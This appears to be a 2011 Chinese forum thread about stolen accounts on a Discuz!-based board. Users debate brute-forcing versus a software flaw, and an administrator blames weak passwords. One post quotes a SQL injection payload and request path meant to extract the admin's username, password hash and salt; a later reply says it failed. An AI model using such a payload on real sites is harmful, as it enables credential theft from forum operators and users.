又一个06年的ID当于茶社陨落，theone老大，到底问题出在哪里？

显示全部楼层 · 发表于 2011-9-20 06:56:33

如果确是会员密码被暴力破解，为什么集中在现在爆发呢？
会不会是DZ本身出现问题？ QQ截图20110920065318.jpg

显示全部楼层 · 发表于 2011-9-20 12:36:54

提供资料：discuz!本身存在漏洞
http://i0day.sinaapp.com/%E6%BC% ... B6%E9%9B%86/46.html

显示全部楼层 · 发表于 2011-9-20 14:07:44

wzmlove1121 发表于 2011-9-20 12:36
提供资料：discuz!本身存在漏洞
http://i0day.sinaapp.com/%E6%BC%8F%E6%B4%9E%E6%94%B6%E9%9B%86/46.html

a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment='

补充内容 (2011-9-20 14:08):
forum.php?mod=misc&tid=1396&action=postappend&pid=12026

显示全部楼层 · 发表于 2011-9-20 14:08:32

经测试无效…………

显示全部楼层 · 发表于 2011-9-21 09:57:41

从管理后台查询的结果，是同一个登录地点对多个用户名逐个尝试。
也就是我们通常说的暴力破解。

最近不断得到被盗用户的反馈，从结果来看，被破解的都是一些密码简单且没有设置安全提问的帐号。

比如，123456.asdfgh等。所以需要给大家提个醒

http://bbs.kafan.cn/thread-1088472-1-1.html

显示全部楼层 · 发表于 2011-9-21 14:25:49

边缘vip 发表于 2011-9-21 09:57
从管理后台查询的结果，是同一个登录地点对多个用户名逐个尝试。
也就是我们通常说的暴力破解。

那边缘大大，可否考虑对部分地区实施IP禁止？
而且暴力破解效率不高啊，失败五次就要等待十五分钟

显示全部楼层 · 发表于 2011-9-21 14:36:39

4534543 发表于 2011-9-21 14:25
那边缘大大，可否考虑对部分地区实施IP禁止？
而且暴力破解效率不高啊，失败五次就要等待十五分钟

已启用新的应对机制http://bbs.kafan.cn/thread-1090087-1-1.html

[软件区] 又一个06年的ID当于茶社陨落，theone老大，到底问题出在哪里？